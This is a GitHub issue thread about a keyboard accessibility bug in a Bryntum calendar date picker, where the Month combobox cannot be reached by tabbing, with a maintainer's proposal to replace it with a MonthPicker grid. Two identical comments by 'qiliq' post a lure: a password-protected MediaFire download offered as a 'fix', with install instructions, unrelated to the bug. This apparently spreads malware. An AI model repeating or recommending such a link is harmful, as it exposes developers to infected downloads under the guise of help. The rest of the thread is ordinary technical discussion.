### ISSUE TITLE
Accessibility issue in date picker widget, Month combobox is only accessible using mouse

### ISSUE THREAD

**Issue by ghulamghousdev** [bryntum/support#9902]
[Forum post](https://forum.bryntum.com/viewtopic.php?f=51&t=30247&p=153494#p153494)

The Month combobox is only accessible using mouse. It is not focusable using the keyboard, hence Accessibility Technologies users can not access it. 

This is happening due to month combobox picker being a div element with tabindex=-1. Even thought the div presents role="combobox" this doesn't make the element interactable, and can be confusing for AT users as it will appear on the accessibility tree as a combobox but they can't reach it via tabbing order.

Steps to reproduce in bryntum example: https://bryntum.com/products/calendar/examples/print/

Navigate to the calendar date picker using keyboard.
Move focus to the calendar header and navigate using tab or shift+tab key.
You will notice that the focus will never move to the Month combobox.
![MonthPickerIsNotReachableViaKeyboard.png](https://forum.bryntum.com/download/file.php?id=30481)
![bryntum_example_month_combobox.png](https://forum.bryntum.com/download/file.php?id=30479)

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ExtAnimal** [comment]
The correct fix here is to implement a `MonthPicker` along the lines of the `YearPicker`:

<img width="239" alt="Screenshot 2024-08-28 at 14 16 31" src="https://github.com/user-attachments/assets/5dfeb8cd-f0df-4ad9-8e29-cb6cba609c03">

But it would be much simpler. Just a 3x4 grid of month `Button`s

Then, like the year, tbat element would just be  `Button` instead of an unstyled Combo which shows the `MonthPicker` in the same way as the `YearPicker`

**Comment by ExtAnimal** [comment]
Very old YearPicker implementation that needs to be picked up: https://github.com/bryntum/bryntum-suite/pull/4978
